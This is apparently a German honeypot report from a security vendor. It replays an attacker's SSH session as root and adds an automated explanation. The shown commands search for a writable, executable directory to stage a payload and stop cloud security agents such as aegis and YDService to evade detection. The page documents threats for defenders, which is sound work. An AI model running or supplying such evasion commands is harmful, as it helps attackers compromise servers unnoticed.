ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Vereinigte Staaten: Ausbruch in eine Shell und Nutzlast ausführbar machen

29.09.2026, 15:44 UTC · 16 Befehle · über ssh · Vereinigte Staaten

Überblick

Dienst
ssh (Port 22)
Herkunft
Vereinigte Staaten · FiberState, LLC
Probierte Zugangsdaten
root / 12345678Sa

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ #!/bin/sh
root@srv01:~$ wdir="/tmp"
root@srv01:~$ for i in "/dev/shm" "/tmp" "/var/tmp" "/home" "/root"; do
root@srv01:~$ touch "$i/test_exec" >/dev/null 2>&1
root@srv01:~$ chmod +x "$i/test_exec" >/dev/null 2>&1
root@srv01:~$ if [ -w "$i" ] && [ -x "$i/test_exec" ]; then
root@srv01:~$ wdir="$i"
root@srv01:~$ rm -f "$i/test_exec"
root@srv01:~$ break
root@srv01:~$ fi
root@srv01:~$ rm -f "$i/test_exec" >/dev/null 2>&1
root@srv01:~$ done
root@srv01:~$ cd "$wdir" || exit 1
root@srv01:~$ for svc in aegis aliyun YDService tat_agent; do
root@srv01:~$ systemctl stop $svc >/dev/null 2>&1
root@srv01:~$ ls -la /var/run/gcc.pid

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich mit einem schwachen Passwort als Root-Benutzer an. Er suchte systematisch nach einem beschreibbaren und ausführbaren Verzeichnis im Dateisystem. Anschließend versuchte er, mehrere spezifische Sicherheitsdienste zu stoppen und prüfte das Vorhandensein einer Prozess-ID-Datei.

Was die Befehle bewirken

Das Skript definiert einen temporären Arbeitsordner und testet Schreibrechte in Standardverzeichnissen wie /tmp. Es wählt das erste Verzeichnis aus, in dem Dateien erstellt und ausgeführt werden dürfen. Danach werden Dienste wie aegis, aliyun und YDService gestoppt, was Cloud-Sicherheitsagenten von Alibaba Cloud sind. Der Befehl ls -la listet Details zur Datei gcc.pid auf, um deren Existenz oder Attribute zu prüfen.

Worauf es hinauslief

Das Vorgehen deutet auf die Vorbereitung einer Persistenz oder die Installation einer Backdoor hin. Das Stoppen von Cloud-Sicherheitsagenten ist ein typischer Schritt, um Erkennung zu vermeiden. Die Prüfung der PID-Datei könnte der Tarnung dienen oder einen bestehenden Prozess identifizieren.

Einordnung

Dieses Muster ist bei automatisierten Botnetzen verbreitet, die Cloud-Server kompromittieren. Die Kombination aus schwachen Passwörtern und dem gezielten Abschalten von Cloud-Agenten ist ein bekanntes Indiz für Skript-basierte Angriffe.